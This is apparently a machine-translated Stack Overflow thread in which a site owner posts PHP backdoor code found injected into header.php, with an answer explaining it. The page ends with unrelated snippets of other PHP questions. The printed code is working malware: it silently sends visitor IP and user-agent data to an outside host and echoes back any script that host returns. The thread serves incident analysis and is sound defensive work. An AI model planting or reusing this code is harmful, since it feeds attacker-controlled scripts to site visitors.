- html - 出于某种原因,IE8 对我的 Sass 文件中继承的 html5 CSS 不友好?
- JMeter 在响应断言中使用 span 标签的问题
- html - 在 :hover and :active? 上具有不同效果的 CSS 动画
- html - 相对于居中的 html 内容固定的 CSS 重复背景?
Avast 不时出现在我的一个网站上。有点奇怪,因为我对安全性非常严格,但我检查了 index.php 文件和所有相关的包含和脚本。在我删除的“header.php”文件中发现了一些奇怪的 PHP 代码。
今晚,avast 再次弹出,尽管我的 FTP 数据显示该文件“自从我修复它后就没有被编辑过”,但代码又出现了。我现在已经更改了密码和所有其他内容。
这是有问题的 PHP 代码,任何关于这到底在做什么的建议都会很好!
<?php
$wp_bskr = 'inf';
$wp_tcc = 'template';
error_reporting(0);
ini_set('display_errors',0);
$wp_hrmr = @$_SERVER['HTTP_USER_AGENT'];
if (( preg_match ('/Gecko|MSIE/i', $wp_hrmr) && !preg_match ('/bot/i', $wp_hrmr))) {
$wp_drss="http://".$wp_tcc.$wp_bskr.".com/".$wp_bskr."/?ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_hrmr);
$ch = curl_init();
curl_setopt ($ch, CURLOPT_URL,$wp_drss);
curl_setopt ($ch, CURLOPT_TIMEOUT, 10);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$wp_wvw = curl_exec ($ch);
curl_close($ch);
}
if ( substr($wp_wvw,1,3) === 'scr' ) {
echo $wp_wvw;
}
?>
********* 更新************
感谢 esqew 更深入地研究这个问题并在您的博文中提供详细信息。确实是可怕的东西。我这边有一些更新要告诉你。
首先,使用 avast 日志(从我的网站被检测到有恶意软件时开始),通过谷歌进行一些搜索,我发现了另一个非常相似的代码示例,我这边 avast 标记的 IP 地址与这篇文章相匹配问题。此处提供了一些信息以缩小范围:malware-traffic-analysis.n*t/2014/05/11/index.html.无论如何,我认为那是帖子。论坛的新手,不确定我是否可以发布链接,所以我给“net”顶级域名加了星标。
从那里,我获取了匹配的 IP,一个包含 javascript 的 url,whois'd 并将所有信息传递给注册商。他们从他们那端看了一下,确认存在恶意行为,令我惊讶的是,他们在一个小时内回复并暂停了域和所有连接到该 IP 的域。
其次,我的虚拟主机发现了他们认为泄漏是如何实现的。没有提供完整的深度细节,我意识到我有一个旧的 wordpress 安装(我的意思是旧的,一个我多年没有使用和忘记的,自 2010 年以来没有更新,所以我认为很容易受到攻击)。从他们的日志来看,这似乎是进入我的服务器的方式,因为我没有安装其他脚本。从几天前开始,我更改了所有密码并完全删除了 WP,因为它不再使用并且目前一切正常。
最佳答案
看起来是某种后门,我们可以进一步探索。前几行似乎设置了一些变量,使代码更难阅读/检测:
$wp_bskr = 'inf'; // simple string settings
$wp_tcc = 'template'; // simple string settings
error_reporting(0); // making errors silent, so they are close to undetectable
ini_set('display_errors',0); // making errors silent, so they are close to undetectable
$wp_hrmr = @$_SERVER['HTTP_USER_AGENT']; // grab the user-agent string from the requesting party
然后它会根据这些字符串构建一个 URL:
http://templateinf.com/inf/?...
...其中包含有关您的用户代理、您的 IP 地址和它来自的页面的大量信息。
然后它在 $wp_hrmr
上运行一个正则表达式变量(您的用户代理字符串)来检查它是 Gecko 还是 MSIE 并且不包含“bot”(带有草率、不必要的括号,我已经清理了一下):
if (preg_match('/Gecko|MSIE/i', $wp_hrmr) && !preg_match('/bot/i', $wp_hrmr)) {
如果满足这些条件,它会创建一个 cURL 请求到它之前创建的骨架 URL:
$ch = curl_init();
curl_setopt ($ch, CURLOPT_URL,$wp_drss);
curl_setopt ($ch, CURLOPT_TIMEOUT, 10);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$wp_wvw = curl_exec ($ch);
curl_close($ch);
然后查看输出,如果它在字符串的特定点包含字符串“scr”,则为 echo
将输出返回给浏览器:
if ( substr($wp_wvw,1,3) === 'scr' ){ echo $wp_wvw; }
根据我个人的判断,这是一个自动化工具放置在那里的东西,要么收集模板的使用统计信息(从 URL 中扣除),要么提醒中央服务器它报告的端点容易受到攻击某些漏洞利用(或者可能是两者的结合)。然而,它似乎还没有混淆到足以证明其被归类为恶意软件的程度,而且它的人类可读性也不足以证明它是合法的。它的错误沉默代码肯定指向前者,但它 有关更多信息,请参阅下面的更新echo
s 输出到缓冲区。无论哪种方式,它都是一段特殊的代码。
然而,这是一个巨大的安全风险,您需要立即联系您的托管服务提供商,因为您的托管网络上可能存在比您的站点更大的问题。虽然这段特殊的代码没有做任何特别恶意的事情,但它仍然是一个风险,应该在您继续执行任何其他操作之前及时处理。
正如@Jonathan 在 OP 的评论中提到的,您网站上出现的任何您未编写的代码都应该接受严格检查。
更新
在 writing this up 之后今晚我正在进行一个博客实验,我在理解这个恶意软件方面取得了长足的进步。
在没有看到您当前的服务器配置的情况下,我很难弄清楚这段代码最初是如何进入您的环境的。不过,我可以肯定地说,这段代码将在未来的某个时候用于大规模 XSS 攻击。
字母scr
提示我 cURL 请求的输出内容最终将包含此字符串,这是过滤不以 <script>
开头的输出的简单方法。 .
一旦攻击者在其端激活包含,服务器很可能会开始使用基于 Javascript 的代码回复请求,并在客户端访问网站时对其进行攻击。攻击者可能正在等待一个广泛传播的 Javascript 引擎错误的发布,他们可以利用这些错误来做比 XSS 更多的恶意事情(可能像远程代码执行)。
如果有足够多的受感染服务器,攻击者就可以利用这些后门来做任何事情:Javascript-based Bitcoin mining , Javascript-based DDOS等
关于PHP Hack - 这段代码在做什么?,我们在Stack Overflow上找到一个类似的问题: https://stackoverflow.com/questions/24374357/
我在 JavaScript 文件中运行 PHP,例如...... var = '';). 我需要使用 JavaScript 来扫描字符串中的 PHP 定界符(打开和关闭 PHP 的 )。 我已经知道使
我希望能够做这样的事情: php --determine-oldest-supported-php-version test.php 并得到这个输出: 7.2 也就是说,php 二进制检查 test.
我正在开发一个目前不使用任何框架的大型 php 站点。我的大问题是,随着时间的推移慢慢尝试将框架融入应用程序是否可取,例如在创建的新部件和更新的旧部件中? 比如所有的页面都是直接通过url服务的,有几
下面是我的源代码,我想在同一页面顶部的另一个 php 脚本中使用位于底部 php 脚本的变量 $r1。我需要一个简单的解决方案来解决这个问题。我想在代码中存在的更新查询中使用该变量。 $name)
我正在制作一个网站,根据不同的情况进行大量 PHP 重定向。就像这样...... header("Location: somesite.com/redirectedpage.php"); 为了安全起见
我有一个旧网站,我的 php 标签从 因为短标签已经显示出安全问题,并且在未来的版本中将不被支持。 关于php - 如何避免在 php 文件中写入
我有一个用 PHP 编写的配置文件,如下所示, 所以我想用PHP开发一个接口(interface),它可以编辑文件值,如$WEBPATH , $ACCOUNTPATH和 const值(value)观
我试图制作一个登录页面来学习基本的PHP,首先我希望我的独立PHP文件存储HTML文件的输入(带有表单),但是当我按下按钮时(触发POST到PHP脚本) )我一直收到令人不愉快的错误。 我已经搜索了S
我正在寻找一种让 PHP 以一种形式打印任意数组的方法,我可以将该数组作为赋值包含在我的(测试)代码中。 print_r 产生例如: Array ( [0] => qsr-part:1285 [1]
这个问题已经有答案了: 已关闭11 年前。 Possible Duplicate: What is the max key size for an array in PHP? 正如标题所说,我想知道
我正在寻找一种让 PHP 以一种形式打印任意数组的方法,我可以将该数组作为赋值包含在我的(测试)代码中。 print_r 产生例如: Array ( [0] => qsr-part:1285 [1]
关闭。这个问题需要多问focused 。目前不接受答案。 想要改进此问题吗?更新问题,使其仅关注一个问题 editing this post . 已关闭 9 年前。 Improve this ques
我在 MySQL 数据库中有一个表,其中存储餐厅在每个工作日和时段提供的菜单。 表结构如下: i_type i_name i_cost i_day i_start i_
我有两页。 test1.php 和 test2.php。 我想做的就是在 test1.php 上点击提交,并将 test2.php 显示在 div 中。这实际上工作正常,但我需要向 test2.php
我得到了这个代码。我想通过textarea更新mysql。我在textarea中回显我的MySQL,但我不知道如何更新它,我应该把所有东西都放进去吗,因为_GET模式没有给我任何东西,我也尝试_GET
首先,我是 php 的新手,所以我仍在努力学习。我在 Wordpress 上创建了一个表单,我想将值插入一个表(data_test 表,我已经管理了),然后从 data_test 表中获取所有列(id
我有以下函数可以清理用户或网址的输入: function SanitizeString($var) { $var=stripslashes($var); $va
我有一个 html 页面,它使用 php 文件查询数据库,然后让用户登录,否则拒绝访问。我遇到的问题是它只是重定向到 php 文件的 url,并且从不对发生的事情提供反馈。这是我第一次使用 html、
我有一个页面充满了指向 pdf 的链接,我想跟踪哪些链接被单击。我以为我可以做如下的事情,但遇到了问题: query($sql); if($result){
我正在使用 从外部文本文件加载 HTML/PHP 代码 $f = fopen($filename, "r"); while ($line = fgets($f, 4096)) { print $l
我是一名优秀的程序员,十分优秀!